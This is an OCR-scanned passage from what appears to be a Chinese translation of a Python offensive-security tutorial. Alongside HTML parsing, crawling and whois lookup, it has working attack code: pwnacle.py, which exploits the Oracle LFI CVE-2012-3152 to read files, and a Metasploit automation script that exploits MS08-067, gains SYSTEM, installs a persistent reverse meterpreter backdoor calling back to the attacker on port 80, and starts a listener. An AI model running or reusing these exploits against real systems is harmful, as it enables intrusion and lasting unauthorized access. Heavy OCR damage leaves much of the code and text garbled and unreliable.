', 'readlines', 'url'] 
»»» request.geturl() 
'http://127.0.0.1/ 
>>> request.getcode() 
200 
>> print request.headers 
Server: SimpleHTTP/0.6 Python/2.7.3 
Date: Mon, 03 Mar 2014 21:07:07 GMT 
Content-type: text/html 
Content-Length: 177 
Last-Modified: Mon, 03 Mar 2014 20:59:02 GMT 






*__module__* 


解析 HTML 


现在 我 们 已 经 使 用 Python 建立 了 一 个 web 请 求 ， 现 在 我 们 要 找 一 个 模块 来 解析 
HTML 文 件 。 而 前 面 我 们 提 到 了 BeautifulSoup 模 块 能 够 帮助 我 们 基于 HTML 标 签 解 
析 HTML。 下 面 有 一 个 例子 ， 可 以 帮助 你 理解 如 何 去 解 析 HTML 文 件 : 


>>> import urllib 
>>> from bs4 import BeautifulSoup 
> url = 'http://127.0.0.1/ 
request = urllib.urlopen(url) 
parsed = BeautifulSoup(request.read(), "lxml") 
parsed.title 
«title»This is a Title! </title> 
>>> parsed.body 
<body><hi>It works!</hi> 
«p»This is the default web page for this server.</p> 
«p»The web server software is running but no content has been added, yet.«/p» 
«/body» 
>>> parsed.iframe 
<iframe src="Testing iframe"></iframe> 
>>> parsed 
<html><head><title>This is a Title! </title><iframe src="Testing iframe"></iframe></head><body><h1>It works!</h1> 
<p>This is the default web page for this server.</p> 
<p>The web server software is running but no content has been added, yet.</p> 
</body></html> 
>>> paragraph = parsed.find_all('p') 





>>> paragraph 

[<p>This is the default web page for this server.</p>, <p>The web server software is running but no content has been added, yet.</p>] 
>>> iframes = parsed.find all('iframe') 

>>> iframes 


[<iframe src="Testing iframe"»«/iframe»] 


BeautifulSoup 对 于 帮助 我 们 解析 HTML 非 常 强大 ， 例 如 你 可 以 使 用 BeautifulSoup 内 
部 的 画 数 "find_all" 去 查找 你 想 要 解析 的 内 容 。 例 如 :"iframes = 
parsed.find_all(‘iframe’)". 


实战 守 一 个 应 用 


大 家 都 知道 ， 我 们 可 以 使 用 大 量 的 查询 去 获取 更 多 的 web 资 源 ， 在 这 里 ，Python 脚 
本 能 够 自动 帮 你 完成 你 的 查询 并 且 获 取 到 你 想 要 的 资源 .我 常常 使 用 iplist.net 去 反 查 
域名 ， 看 看 到 底 有 多 少 个 域名 指向 了 一 个 IP. 


当 你 开始 写 脚 本 的 时 候 ， 你 首先 得 先 考虑 两 件 事情 : 


1、 请 求 URL 的 连接 结构 2、 你 想 要 什么 信息 ? 你 可 以 通过 HTML 标 签 定位 到 你 想 
要 的 数据 部 分 ， 当 然 为 更 加 准确 ， 你 也 可 以 使 用 正则 式 去 匹配 . 


iplist.net 的 结构 相对 简单 "http://iplist.net//", 因 为 我 们 能 够 相对 比较 容易 的 从 一 个 文件 
里 面 使 用 循环 把 所 有 的 IP 都 读 取 出 来 ， 下 一 步 就 是 查看 源 代码 ， 看 看 你 最 想 要 的 是 
那个 部 分 的 内 容 ， 在 这 个 例子 中 我 们 可 以 看 到 HTML 标 签 header 里 面 有 一 


fT <h2>domain_name</h2> . 


那么 我 们 就 使 用 BeautifulSoup 去 分 离 这 个 页 面 的 源码 ， 下 面 是 执行 脚本 的 过 程 ， 我 
们 这 里 只 提取 域名 并 且 打 印 到 STDOUT 


>>> url = urllib.urlopen("http://iplist.net/216.52.242.86/") 
parsed = BeautifulSoup(url.read(), "lxml") 
results = parsed.find all('h2') 


edin.com.mx -in</ edin. lk</ com.uy< h2>news. Linkedin. Linkedin. bg</h2>, 
kedin. fi 


eedera.com</ . inkedin.dk< 1 </h2 >www. Lin 


din.fi</h2>, rect. Linkedin.com 
kedin.com.a >1i i 





wi 
din.com.au«/h2» <h2>linkedin.ru</h2>, 


FireBug 是 一 个 分 析 源 代码 的 工具 ， 很 强加 ， 下 面 你 就 可 以 看 到 高 之 的 代码 就 是 我 
们 需要 的 信息 ; 





M} last checked: Thu, 27 Feb 2014 05:18:02 GMT 
a 216.52.242.86 


mx 10 mail.linkedin.com 

mx 10 mail-c6.linkedin.com 
mx 30 mail-c.linkedin.com 
ns ns1.linkedin.com 

ns ns2.linkedin.com 

ns ns3.linkedin.com 

ns ns1.p43.dynect.net 
ns ns2.p43.dynect.net 
ns ns3.p43.dynect.net 
nsd ns1.linkedin.com 

nsd ns2.linkedin.com 

nsd ns3.linkedin.com 

nsd ns1.p43.dynect.net 
nsd ns2.p43.dynect.net 
soa ns1.linkedin.com 
soam hostmaster.linkedin.com 
a D = 


HTML v | CSS DOM 


¿> Edit h2 < pre < body < html 
«br» 
由 <table style="height:28px;border:none"> 
由 «script type="text/javascript"> 
«br» 
«a href="/">/</a> 
=] <pre> 


说 到 这 里 ， 这 篇 文章 就 已 经 就 已 经 完成 了 ， 对 于 web 请 求 你 可 以 去 分 析 python 究 竟 
是 如 何 去 请 求 的 ， 并 且 如 何 去 提 取 自 己 有 用 的 信息 并 且 打 印 到 STDOUT. 这 里 有 一 个 
解析 iplist.net 比 较 复 条 的 脚本 ， 里 面 有 非常 完整 的 解析 原理 。 大 家 可 以 看 看 


TER 


ix — Ei IZ ie Fg — E83 B] (optparse,spider)A5ER— ME BMweb aA. JE 
虫 其 实 就 是 一 个 枚 举 出 一 个 网 站 上 面 的 所 有 链接 ， 以 帮助 你 创建 一 个 网 站 地 图 的 
web 应 用 程序 。 而 使 用 Python 则 可 以 很 快 的 帮助 你 开发 出 一 个 怜 虫 脚本 . 


你 可 以 创建 一 个 聆 虫 脚本 通过 href 标 签 对 请 求 的 响应 内 容 进 行 解析 ， 并 且 可 以 在 解 
析 的 同时 创建 一 个 新 的 请 求 ， 你 还 可 以 直接 调用 spider 模 块 来 实现 ， 这 样 就 不 需要 
自己 去 写 那 衬 多 的 代码 了 : 


cell@cell: ~ 
cell@cell:~$ python crawler.py -r sites 
[*] Web Crawl Results for: http:h/127.0.0.1 
http://127.0.0.1: has a link count of 1 
http://127.0.0.1/ 
cell@cell:~$ | 


w-200, d-5, t-5) 


*str(link count) 
*URL 


) 
par .add XEM , dest= 
hel 


(opti s) = 
URLs opti .URLS 


(URLs == No 2 
r.usage 
sys rete) 


wler (URLs) 





这 里 有 几 个 参数 你 需要 去 了 解 一 下 ， 不 然 上 面 这 段 脚 本 是 无 法 成 功 运行 
的 :"myspider(b=URL.strip(), w=200, d=5, t=5)" 这 个 函数 将 会 返回 两 个 列表 : 子 url 链 
接 与 路 径 。 你 也 可 以 自己 修改 myspider 画 数 里 面 的 参数 : 


b — 基本 的 web URL( 默 认 : 无 ) w 一 抓 取 的 数量 (默认 : 200) d — 抓 取 的 深度 层级 
(默认 : 5)t 一 设置 线程 数 (默认 : 无 ) 


这 篇 文章 主要 是 先 介 绍 一 个 web 有 候 虫 的 入 门 基础 ，web 资 源 干 变 万 化 。 所 以 未 来 在 
博客 的 其 他 文章 里 面 再 深入 的 讲述 攻击 Web 服务 器 一 些 更 高 级 的 案例 ; 


A FAY pythonfe Ex BLZ (S 23 Fr EX: 


#!/usr/bin/python 
from spider import webspider as myspider 
import sys, optparse 


def crawler(URLs): 

for line in open(URLs, 'r'): 
URL - line.strip() 
links = myspider(b=URL.strip(), w-200, d=5, t=5) 
link_count = len(links[0]) 
out = URL+": has a link count of "+str(link count) 
print "[+] Web Crawl Results for: "+URL 
print out 
for item in links[1]: 

print item 


def main(): 

# optparse 模 块 允 许 你 通过 参数 选项 来 调用 那 段 代 码 

# 这 里 我 使 用 '-r' 选 项 并 且 内 容 会 保存 在 URLs 变 量 里 面 

# 当 使 用 -r 参 数 的 使 用 脚本 会 去 读 取 指定 的 文件 夹 
parser = optparse.OptionParser(sys.argv[O]*' "+ \ 
'-r «file with URLS>') 
parser.add option('-r', dest-'URLs', type='string', \ 

help-'specify target file with URLs') 

(options, args) - parser.parse args() 
URLs-options.URLs 


if (URLs -- None): 
print parser.usage 
sys.exit(0) 


else: 
crawler(URLs) 
if | name__ == "_ main__": 
main() 


OES | 


e Spider 模块 


Web 扫 摘 和 利用 


本 章 将 会 介绍 如 何 使 用 python 去 构建 一 个 简单 的 web 打 描 器 ， 并 且 写 一 个 简单 的 
exp。 有 些 时 候 如 果 组 织 会 发 布 出 来 一 些 漏洞 测试 的 POC， 然 后 使 用 者 可 以 使 用 这 
些 poc 去 检查 自己 系统 的 漏洞 ， 但 是 在 这 种 情况 下 ， 如 果 是 等 poc 发 布 出 来 早 以 为 时 
已 晚 ! 


在 第 5 章 的 时 候 告 诉 了 大 家 基本 的 web 请 求 ,这 一 章 我 们 讲 两 个 新 的 内 容 : 


。 检测 特定 的 服务 器 列表 . 
e 利用 一 个 Oracle 的 本 地 包含 漏洞. 


Web 打 描 


下 面 的 这 个 脚本 使 用 "-i" 参 数 把 文件 的 url 连 接 传递 到 脚本 里 面 ， 然 后 使 用 "-r" 参 数 指 
定 请 求 的 路 径 , 最 好 使 用 "-s" 参 数 去 指定 检测 是 否 含有 CLI 漏 洞 的 字符 串 . 


$ python sling.py -h 
Usage: sling.py -i «file with URLs» -r -s [optional] 


Options: 
-h, --help show this help message and exit 
-i SERVERS specify target file with URLs 
-r RESOURCES specify a file with resources to request 
-S SEARCH [optional] Specify a search string -s 


存储 url 链 接 列 表 文 件 的 文本 格式 应 该 是 这 样 的 一 一 "http://www.google.com" —17, 
并 且 文 件 请 求 的 路 径 应 该 是 "request/" 每 行 ,例如 : 


reqs: 
CFIDE/ 
admin/ 
tmp/ 


下 面 是 一 个 脚本 调用 的 例子 但 是 没有 指定 检测 字符 串 : 


$ python sling.py -i URLs -r reqs 

[+] URL: http://www.google.com/CFIDE/ [404] 
[*] URL: http://www.google.com/admin/ [404] 
[+] URL: http://www.google.com/tmp/ [404] 

[+] URL: http://www.yahoo.com/CFIDE/ [404] 
[*] URL: http://www.facebook.com/CFIDE/ [404] 
[*] URL: http://www.facebook.com/admin/ [404] 
[*] URL: http://www.facebook.com/tmp/ [404] 


现在 当 创 建 这 些 请 求 的 时 候 ， 你 可 能 想 定义 一 个 检测 语句 以 减少 误 报 ， 例 如 : 你 现 

在 请 求 的 路 径 是 "CFIDE/administrator/enter.cfm", 你 可 以 指定 检 

测 "CFIDE" 的 ". cfm" 页 面 是 否 有 问题 ,这 样 就 帮助 你 减少 很 多 不 必要 耗费 的 时 间 . 下 面 
这 个 例子 演示 了 上 面 脚本 的 完整 示例 : 


$ python sling.py -i URLs -r reqs -s google 

[+] URL: http://www.google.com/CFIDE/ [404] Found: 'google' in oupt 
[+] URL: http://www.google.com/admin/ [404] Found: 'google' in oupt 
[*] URL: http://www.google.com/tmp/ [404] Found: 'google' in ouput 


| — 14 








正如 你 所 看 到 的 ， 这 个 脚本 只 会 检测 带 有 ' google 

过 "STDOUT" 显 示 在 屏幕 上 面 ,这 是 一 个 很 简单 的 脚本 能 够 帮 你 快速 的 检索 一 些 web 
资源 ,更 进一步 ,我 们 可 以 指 定 服务 器 的 版 本 号 和 漏洞 版 本 . 完整 的 脚本 在 教程 的 最 后 
面 : 


自动 web 攻 击 应 用 
在 几 个 月 以 前 ,一 个 安全 研究 员 NI@root 发 表 过 一 篇 详细 的 Oracle 本 地 包含 漏洞 的 
报告 ,在 报告 发 布 的 同时 还 发 布 了 一 个 POC 检 测 工具 ,用 来 检测 你 的 服务 器 是 否 


bug, 除 此 以 外 就 没有 任何 工具 了 ,该 漏洞 允许 你 通过 发 起 以 下 请 求 连接 来 访问 服务 器 
的 其 他 文件 或 目录 ,使 用 "file:///" 


request = '/reports/rwservlet?report=test.rdf+desformat=html+destyj 


下 面 是 调用 这 个 脚本 的 语法 : 





$ python pwnacle.py <server> <resource> 


pwnacle.py: 


THEHHHHHHHHHHHHHHHHHBHHHHHHHBHHBHHHHHHHHHHBHHHBHE 
# pwnacle.py - Exploits CVE-2012-3152 # 
# Oracle Local File Inclusion (LFI) # 
THEHHHHHHHHHHHHHBHHHHHHBHHHHHHHBHBHHBHHHHHHHHHBHHHBHE 


import urllib, sys, ssl, inspect 
exec inspect.getsource(ssl.wrap socket).replace("PROTOCOL SSLv23",' 
import socket 


server - sys.argv[1] # Assigns first argument given at the CL: 
dir = sys.argv[2] # Assigns second argument given at the CI 
ip = server.split('/')[2] + formats the server by splitting the st 
req = '/reports/rwservlet?report-test.rdfe*desformat-html*destype-c: 


print "Sending Request: "+server+req+dir+'"' 


if 'http://' in server: # 使 用 http 的 ur11ib 模 块 ”-- 如 果 是 ss1 协 议 就 出 抛 
try: 
conn = urllib.urlopen(server+reg+dir+'"') + 发 送 请 求 
out - conn.readlines() 
for item in conn: 
print item.strip() 
except Exception as e: 
print e 


if 'https://' in server: # Create web request with ssl module 
try: 

conn = ssl.wrap_socket(socket.create_connection( (i 
request = "GET '+reg+dir+'"'"+" HTTP/1.1'+'\n' 
request += 'Host: '+ip+'\n' 
request += 'User-Agent: Mozilla/5.0 '+'\n' 
request += 'Accept: text/html, application/xhtml+xm. 
request += 'Accept-Language: en-US, en;q=0.5'+'\n' 
request += 'Accept-Encoding: gzip, deflate'+'\n' 
request += 'Connection: keep-alive'+'\n' 
conn.send(request+'\n' ) 
print conn.recv() 
print conn.recv(20098) 


except Exception as e: 
print e 


KI F ; 





Sling.py: 


THEHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHBHHHHHWHE 
# sling.py - checks for resources # 
# Can seach for string in response # 
THEHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHEI 


from bs4 import BeautifulSoup 


import sys, optparse, socket 
from urllib import urlopen 


class Colors: 
RED = '\033[91m' 
GREEN = 'N033[92m' 


def webreq(server, resources): # EN 
try: 

resource = [] 

for item in open(resources, 'r'): # 对 请 求 ， 

resource.append(item.strip()) # 

for item in resource: # 循 环 数 1 

s-socket.socket(socket.AF INET, socket.SOCt 

s.settimeout(5) # 设置 过 

url = server.strip()+item.strip() # 

request = urlopen(url) # 

if search: # URES US 


parsed = BeautifulSoup(request. reac 
if search in str(parsed): 
print Colors.GREEN+"[+] URI 
elif request.getcode() == 404: 
print Colors.RED+"[+] URL: "+url1+" 
elif request.getcode(): 
print Colors.GREEN+"[+] URL: "+url+" ["+str(rec 


except:pass 


def main(): 

# 创建 一 个 CLIPRWRHES HEIR SER 

parser = optparse.OptionParser(sys.argv[0]+' "+ \ 
'-i «file with URLs» -r -s [optional]') 
parser.add option('-i', dest='servers', type='string', helt 
parser.add_option('-r', dest='resources', type='string', he 
parser.add option('-s', dest='search', type='string', help: 
(options, args) - parser.parse args() 
servers-options.servers 
resources-options.resources 
global search; search=options.search 


if (servers == None) and (resources==None): # 
print parser.usage # if not pr: 
sys.exit(0) 


if servers: 


for server in open(servers, 'r'): H (Bx 
webreq(server, resources) # 调用 ， 
function 
if | name == "__main_": 


main() 
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Whois Bi 3) à i4] 


这 一 章 将 教 大 家 一 些 技巧 性 的 东西 , 教 大 家 使 用 Cymru's 团 队 提 供 的 whois 模 块 来 做 
一 个 whois 信 息 查询 工具 ， 使 用 这 个 模块 可 以 帮 你 节省 大 量 的 的 时 间 , 废 话 少 说 ,现在 
就 让 我 们 开始 吧 ! 


这 个 模块 并 且 可 以 使 用 之 前 我 们 讲 过 的 dir 函 数 去 看 看 这 个 模块 提供 
SPREE 


>>> from cymruwhois import Client 

>>> c = Client() 

>>> dir(c) 

['KEY FMT', ' doc ', ' init ', '_module__', ' begin', '_connec 
>>> 


国定 = 








现在 我 们 使 用 lookup 阔 数 来 查询 一 个 单独 的 IP 地 址 ， 在 后 面 我 们 会 使 
用 "lookupmany" 来 查询 一 个 IP 数 组 列表 : 


>>> google = c.lookup('8.8.8.8') # 译 者 注 : 国 内 会 被 GFW 

>>> google 

«cymruwhois.record instance: 15169|8.8.8.8|8.8.8.0/24|US|GOOGLE - ( 
>>> type(google) 

«type 'instance'» 

>>> 


Ki mu E 





现在 我 们 有 一 个 cymruwhois.record 的 实例 ,可 以 从 中 提取 出 下 面 这 些 信息 


>>> 

>>> dir(google) 

[doce init Ta modules > ensu fash. 
>>> google.ip 

'8.8.8.8' 

>>> google.owner 

'GOOGLE - Google Inc.,US' 
>>> google.cc 

' US I 

>>> google.asn 

'15169' 

>>> google.prefix 
'8.8.8.0/24' 

>>> 














我 们 以 前 思考 处 理 多 个 ip 列表 的 时 候 是 使 用 for 循 环 来 处 理 的 ,但 在 这 里 我 们 并 不 需要 

使 用 for 循 环 去 通 历 整个 数组 列表 ,我 们 可 以 使 用 Cymru 团 队 提供 的 "lookupmany" 画 

数 去 代替 自己 写 的 循环 代码 ,下 面 将 演示 了 一 个 比较 复杂 的 脚本 :从 一 个 文件 里 面 读 
又 到 IP 列 表 , 然 后 执行 whois 信 息 查 询 : 


我 们 通常 使 用 tcpdump,BPF 还 有 bash-fu 来 处 理 IP 列 表 , 下 面 我 们 抓 取 了 SYN 包 里 
面 "tcp[13]=2" 的 ip 并 且 通 过 awk 的 通道 stdout 与 stdin 把 第 六 个 元 素 使 用 " awk “print 
$6}" 抓 取出 来 ， 然 后 把 使 用 awk 抓 取出 来 的 ip 写 入 到 一 个 文件 里 面 : 


~$ tcpdump -ttttnnr t.cap tcp[13]=2 | awk '{print $6}' | awk -F ". 
reading from file t.cap, link-type LINUX_SLL (Linux cooked) 

~$ python ip2net.py -r ips.txt 

[+] Querying from: ips.txt 





173.194.0.0/16 # - 173.194.8.102 (US) - GOOGLE - Google Inc 
~$ 
4] — 8 


现在 让 我 看 看 ijp2net.py 这 个 脚本 ,里 面 有 注释 可 以 帮助 你 快速 的 理解 这 个 脚本 究竟 是 
干 些 什么 : 


ip2net.py 


#!/usr/bin/env python 
import sys, os, optparse 
from cymruwhois import Client 


def look(iplist): 
c-Client() # 创建 一 个 Client 的 实例 类 
try: 
if ips !- None: 
r = c.lookupmany dict(iplist) # 利用 lookupmany_dict( ) 加 3 
for ip in iplist: 4Zi/5lookupman dict ( )4£ ABS1& 
net = r[ip].prefix; owner = r[ip].owner; cc = r[ip. 
line = '%-20s # - %15s (%S) - %s' % (net,ip,cc, owne 
print line 
except: pass 


def checkFile(ips): # 检查 文件 是 否 能 够 读 取 

if not os.path.isfile(ips): 
print '[-] ' * ips * ' does not exist.' 
sys.exit(0) 

if not os.access(ips, os.R OK): 
print '[-] ' + ips + ' access denied.' 
sys.exit(0) 

print '[+] Querying from: ' +ips 


def main(): 
parser = optparse.OptionParser('%prog '+ \ 
'-r «file with IPs» || -i <IP>') 
parser.add option('-r', dest-'ips', type='string', \ 


help-'specify target file with IPs') 
parser.add option('-i', dest-'ip', type='string', \ 
help-'specify a target IP address') 
(options, args) - parser.parse args() 
ip - options.ip 4 Assigns a -i «IP» to variable 'ip' 
global ips; ips = options.ips # 赋值 -r «fileName» 给 变量 'ips' 
if (ips == None) and (ip == None): # 如 果 缺 少 参数 就 输出 使 用 手册 
print parser.usage 
sys.exit(0) 
if ips !- None: #42 $ips 
checkFile(ips) # 检 查 文件 是 否 能 够 读 取 
iplist = [] # 创建 ipsList 列 表 对 象 
for line in open(ips, 'r'): # 解析 文件 内 容 
iplist.append(line.strip('\n')) # 添加 一 行 新 内 容 并 且 删 除 换 1 
look(iplist) # i4FA1look() HR 


else: # 4n4Tlookup() KR HARNSEFA#AITE 'ip' 
try: 
c=Client() 
r = c.lookup(ip) 
net = r.prefix; owner = r.owner; cc = r.cc 
line = '%-20s # - %15s (%S) - %s' % (net,ip,cc, 
print line 
except:pass 
if _name__ == "__main_": 
main( ) 


E 





目 动 化 命 爸 


这 一 章 将 会 介绍 使 用 python 自 动 执 行 系统 命 命 ,我 们 将 使 用 python 展 示 两 个 执行 命 命 
的 方式 (os,subprocess). 


当 你 开始 创建 一 个 脚本 的 时 候 , 你 会 发 现 os.system 和 subprocess.Popen 都 是 执行 系 
统 命令 ,它们 不 是 一 样 的 吗 ?其 实 它 们 两 个 根本 不 一 样 ,Subprocess 允 许 你 执行 命 售 直 
接 通过 stdout 赋 值 给 一 个 变量 ,这 样 你 就 可 以 在 结果 输出 之 前 做 一 些 操作 ,譬如 :输出 
内 容 的 格式 化 等 .这 些 东 西 在 你 以 后 的 会 很 有 帮助 . 


OKk, 说 了 这 人 么 多 ,让 我 们 来 看 看 代码 : 


>>> 

>>> import os 

>>> OS.System('uname -a') 

Linux cell 3.11.0-20-generic #35-precise1-Ubuntu SMP Fri May 2 21:{ 
0 

>>> OS.System('id') 

uid-1000(cell) gid-1000(cell) groups-1000(cell),O(root) 
0 

>>> os.system('ping -c 1 127.0.0.1') 

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 

64 bytes from 127.0.0.1: icmp req-1 ttl-64 time=0.043 ms 


--- 127.0.0.1 ping statistics --- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev - 0.043/0.043/0.043/0.000 ms 

0 

>>> 


HES E 


上 面 这 段 代码 并 没有 完全 的 演示 完 os 模块 所 有 的 功能 ,不 过 你 可 以 使 用 "dir(os)" 命 合 
ke BHR GEE: 如 果 不 会 使 用 可 以 使 用 help() 命 令 ) 


下 面 我 们 使 用 subprocess 模 块 运行 相同 的 命令: 





>>> import subprocess 

>>> 

>>> com_str ‘uname -a' 

>>> command subprocess.Popen([com str], stdout=subprocess.PIPE, : 
>>> (output, error) = command.communicate() 

>>> print output 

Linux cell 3.11.0-20-generic #35-precise1-Ubuntu SMP Fri May 2 21:{ 


>>> com str 'id' 

>>> command subprocess.Popen([com str], stdout=subprocess.PIPE, : 
>>> (output, error) = command.communicate() 

>>> print output 

uid-1000(cell) gid-1000(cell) groups-1000(cell),O(root) 

>>> 


= — 





和 第 一 段 代 码 对 比 你 会 发 现 语法 比较 复 条 ,但 是 你 可 以 把 内 容 存储 到 一 个 变量 里 面 并 
且 你 也 可 以 把 返回 的 内 容 写 入 到 一 个 文件 里 面 去 ; 


>>> com_str 'id' 
>>> command subprocess.Popen([com str], stdout=subprocess.PIPE, : 
>>> (output, error) = command.communicate() 
>>> output 
'uid-1000(cell) gid-1000(cell) groups-1000(cell),O(root)^n' 
>>> f = open('file.txt', 'w') 
>>> f.write(output) 
>>> f.close() 
>>> for line in open('file.txt', 'r'): 
print line 


uid-1000(cell) gid-1000(cell) groups-1000(cell),O(root) 





这 一 章 我 们 讲解 了 如 何 自动 化 执行 系统 命令 , 记 住 当 你 以 后 遇 到 CLI 的 时 候 可 以 把 它 
丢 到 python 脚 本 里 面 ; 


最 后 自己 尝试 一 下 写 一 个 脚本 ,把 输出 的 内 容 写 入 到 一 个 文件 里 面 或 者 是 只 输出 部 分 


AUN. 


= 
Dilll 


Python 版 的 Metasploit 


pymsf 模 块 是 Spiderlabs 实 现 的 一 个 python 与 Metasploit 的 msgrpc 通 信 的 python 模 
块 ,但 首先 你 需要 先 启 动 msgrpc 服 务 , 命 令 如 下 : 


load msgrpc Pass=<password> 


与 msgrpc 进 行 通信 其 实 就 是 与 nsfconsole 进 行 通信 ， 首 先 你 需要 创建 一 个 msfrpc 的 
类 ,登录 到 msgrpc 服 务 器 并 且 创 建 一 个 虚拟 的 终端 ,然后 你 就 可 以 在 你 创建 的 虚拟 终 
端 上 面 执行 多 个 命令 的 字符 串 .你 可 以 调用 模块 的 方法 与 console.write 执 行 命令 ,并 且 
通过 "console.read" 从 虚拟 终端 上 面 读 取 输 入 的 值 .这 篇 文章 将 演示 如 何 使 用 pymsf 模 
块 并 且 如 何 开发 出 一 个 完整 的 脚本 . 


这 里 有 一 个 函数 它 创建 了 一 个 msfrpc 实 例 , 登 录 到 msgrpc 服 务 器 ,并 且 创 建 了 一 个 虚 
d m. 


def sploiter(RHOST, LHOST, LPORT, session): 
client = msfrpc.Msfrpc({}) 
client.login('msf', '123') 
ress = client.call('console.create') 
console_id = ress['id'] 


## Exploit MS08-067 ## 

commands = """use exploit/windows/smb/ms08_067_netapi 
set PAYLOAD windows/meterpreter/reverse_tcp 

set RHOST """+RHOST+""" 

set LHOST """+LHOST+""" 

set LPORT """+LPORT+""" 

set ExitOnSession false 

exploit -z 

print "[+] Exploiting MS08-067 on: "+RHOST 
client.call('console.write',[console id,commands]) 
res - client.call('console.read',[console id]) 
result = res['data'].split('\n') 


上 面 的 这 一 小 段 代 码 创建 了 一 个 MSF 的 资源 文件 ,这 样 你 就 可 以 通过 "resoucen "ap 
邻 去 执行 指定 文件 里 面 中 一 系列 的 命令 .下 面 我 们 将 通过 "getsystem" 命 令 把 这 个 文 
件 的 提 权 ,建立 一 个 后 门 打开 80 端 口 来 转发 .并 且 永 久 的 运行 .最 后 上 传 我 们 的 漏洞 
exp 并 且 在 命令 模式 下 面 展 展 的 安装 : 


# OGXTPEEURSE—TMSF .rc 文件 
def builder(RHOST, LHOST, LPORT): 
post - open('/tmp/smbpost.rc', 'w') 
bat - open('/tmp/ms08067 install.bat', 'w') 


postcomms - """getsystem 
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" 
CUBE) 
upload /tmp/ms08067 patch.exe c:\\ 
upload /tmp/ms08067 install.bat c:\\ 
execute -f ms08067 install.bat 
batcomm = "ms08067 patch.exe /quiet" 
post.write(postcomms); bat.write(batcomm) 
post.close(); bat.close() 


通过 上 面 的 那 段 代码 ,将 会 创建 一 个 .rc 的 文件 .通过 msf 模 

块 “post/multi/gather/run_console_rc_file” 在 当前 的 meterpreter 会 话 中 运行 生成 的 文 
44+, + iit console.write dp 45 M E 49. in S A Br HE, 18 it console.read fip $ 3K [B] y. 3x 
DAR: 


## 运行 生成 的 exp ## 


runPost = """use post/multi/gather/run console rc file 
set RESOURCE /tmp/smbpost.rc 

set SESSION """+session+""" 

exploit 


print "[+] Running post-exploit script on: "+RHOST 
client.call('console.write',[console id,runPost]) 
rres - client.call('console.read',[console id]) 

## Setup Listener for presistent connection back over port 80 ## 
sleep(10) 
listen - """use exploit/multi/handler 

set PAYLOAD windows/meterpreter/reverse tcp 

set LPORT 80 

set LHOST """+LHOST+""" 

exploit 

print "[+] Setting up listener on: "+LHOST+":80" 

client.call('console.write',[console id,listen]) 

lres - client.call('console.read',[console id]) 

print lres 


上 面 代码 中 的 变量 (RHOST LHOST, LPORT 等 ) 都 是 通过 optparse 模 块 从 命令 终端 
输入 的 ,完整 的 脚本 托管 在 github 上 面 ,有 时 候 你 需要 知道 脚本 的 生成 的 地 方 都 是 静态 
地 址 ,不 会 在 其 他 的 目录 生成 ,例如 ms08067 的 补丁 就 会 在 你 的 /tmp/ 目 录 下 面 。 大 家 
只 要 知道 基础 然后 对 下 面 的 代码 进行 一 定 的 修改 就 可 以 编程 一 个 属于 你 自己 的 msf 
自动 化 攻击 脚本 ,我 们 建议 通过 博客 里 面 发 表 的 一 些 简 单 的 例子 出 发 ,然后 自己 写 一 
个 msf 攻 击 脚本 : 


import os, msfrpc, optparse, sys, subprocess 
from time import sleep 


# Function to create the MSF .rc files 
def builder(RHOST, LHOST, LPORT): 
post - open('/tmp/smbpost.rc', 'w') 
bat = open('/tmp/ms08067 install.bat', 'w') 


postcomms = """getsystem 
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" 
coc NN 
upload /tmp/ms08067 patch.exe c:\\ 
upload /tmp/ms08067 install.bat c:\\ 
execute -f ms08067 install.bat 
batcomm = "ms08067 patch.exe /quiet" 
post.write(postcomms); bat.write(batcomm) 
post.close(); bat.close() 


# Exploits the chain of rc files to exploit MS08-067, setup persist 
def sploiter(RHOST, LHOST, LPORT, session): 
client = msfrpc.Msfrpc( (3) 
client.-login( msf' 123%) 
ress = client.call('console.create' ) 
console id = ress['id'] 


## Exploit MS08-067 ## 
commands = """use exploit/windows/smb/ms08 067 netapi 

set PAYLOAD windows/meterpreter/reverse tcp 

set RHOST """+RHOST+""" 

set LHOST """+LHOST+""" 

set LPORT """+LPORT+""" 

set ExitOnSession false 

exploit -z 
print "[+] Exploiting MS08-067 on: "+RHOST 
client.call('console.write',[console id,commands]) 
res - client.call('console.read',[console id]) 
result = res['data'].split('\n') 


## Run Post-exploit script ## 


runPost = """use post/multi/gather/run console rc file 
set RESOURCE /tmp/smbpost.rc 
set SESSION """+session+""" 
exploit 


print "[+] Running post-exploit script on: "+RHOST 
client.call('console.write',[console id,runPost]) 
rres - client.call('console.read',[console id]) 

## Setup Listener for presistent connection back over port 80 ## 
sleep(10) 
listen - """use exploit/multi/handler 


set PAYLOAD windows/meterpreter/reverse tcp 

set LPORT 80 

set LHOST """+LHOST+""" 

exploit 
print "[+] Setting up listener on: "+LHOST+":80" 
client.call('console.write',[console id,listen]) 
lres - client.call('console.read',[console id]) 
print lres 


def main(): 

parser = optparse.OptionParser(sys.argv[0] + 
' -p LPORT -r RHOST -1 LHOST' ) 
parser.add option('-p', dest='LPORT', type='string', \ 
help ='specify a port to listen on') 
parser.add option('-r', dest='RHOST', type='string', \ 
help-'Specify a remote host' ) 
parser.add_option('-1', dest='LHOST', type='string', \ 
help-'Specify a local host') 

parser.add_option('-s', dest='session', type='string', \ 
help ='specify session ID') 

(options, args) = parser.parse args() 

session-options.session 

RHOST-options.RHOST; LHOST-options.LHOST; LPORT-options.LPORT 


if (RHOST -- None) and (LPORT -- None) and (LHOST -- None): 
print parser.usage 
sys.exit(0) 


builder(RHOST, LHOST, LPORT) 
sploiter(RHOST, LHOST, LPORT, session) 


if name == "_ main ": 
main() 


sr 





Ay ZU 


这 一 章 , 我 们 来 讲 讲 如 何 使 用 python 做 一 个 伪 终 端 .不 过 在 这 之 前 你 需要 先 了 解 一 点 
伪 终 端的 意思 ,还 有 一 些 技巧 .这 个 我 们 会 在 下 面 讲 到 : 


伪 终 端 其 实 就 是 命令 终端 (Cmd.exe,/bin/sh) 通 过 网 络 接口 反弹 给 攻击 者 ,或 者 是 新 建 
一 个 监听 端口 反弹 一 个 终端 给 攻击 者 ,值得 注意 的 就 是 原 终端 对 于 标准 的 输入 ,输出 
是 不 做 处 理 的 (stdin/stdout/stderr), 同 样 的 反弹 的 shell 也 是 不 对 它 做 处 理 的 .(ssh 访 问 
